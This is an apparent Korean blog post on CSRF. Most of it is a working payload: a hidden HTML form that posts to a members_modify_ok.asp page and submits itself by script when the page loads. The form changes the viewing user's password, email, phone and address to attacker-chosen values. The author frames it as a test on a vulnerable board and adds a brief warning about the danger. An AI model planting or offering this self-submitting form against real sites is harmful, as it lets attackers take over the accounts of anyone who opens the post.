CSRF에 대해 물어보는 사람은 많다.
실습이 쉽지 않기 때문이다.
web의 동작 방식에 대한 이해가 없으면 알기 어렵다.
<form id="test" action="../login/members_modify_ok.asp" METHOD="POST">
<input type="hidden" maxlength=8 name=mem_pwd size="10" class="box" value='xx12345'>
<input type="hidden" name="mem_email" size="30" class="box" value='hacker@paran.com'>
<input type="hidden" name="tel2" size="5" class="box" maxlength="4" value='222'>
<input type="hidden" name="tel3" size="5" class="box" maxlength="4" onkeydown="javascript:IsNumber()" value='333'>
<input type="hidden" name="hp1" size="5" class="box" maxlength="4" onkeydown="javascript:IsNumber()" value='000'>
<input type="hidden" name="hp2" size="5" class="box" maxlength="4" onkeydown="javascript:IsNumber()" value='000'>
<input type="hidden" name="hp3" size="5" class="box" maxlength="4" onkeydown="javascript:IsNumber()" value='0000'>
<input type="hidden" name="zip1" size="3" class="box" readonly onclick='javascript:post_no_search();' value='158'>
<input type="hidden" name="zip2" size="3" class="box" readonly onclick='javascript:post_no_search();' value='123'>
<input type="hidden" name="addr1" size="35" class="box" readonly onclick='javascript:post_no_search();' value='seoul'>
<input type="hidden" name="addr2" size="35" class="box" value='kangnam'>
<script>var tt=document.getElementById("test");tt.submit();</script>
</form>
게시글에 상기와 같은 코드를 통해 열람하는 사용자의 pw를 바꿀 수 있다.
물론 취약한 test 게시판의 경우다.
이 공격은 위험성이 있으므로, 게시글을 올리는 수준으로 test 해야 한다. 회원 정보를 마음대로 바꾸는 건 위험하다.
댓글 달기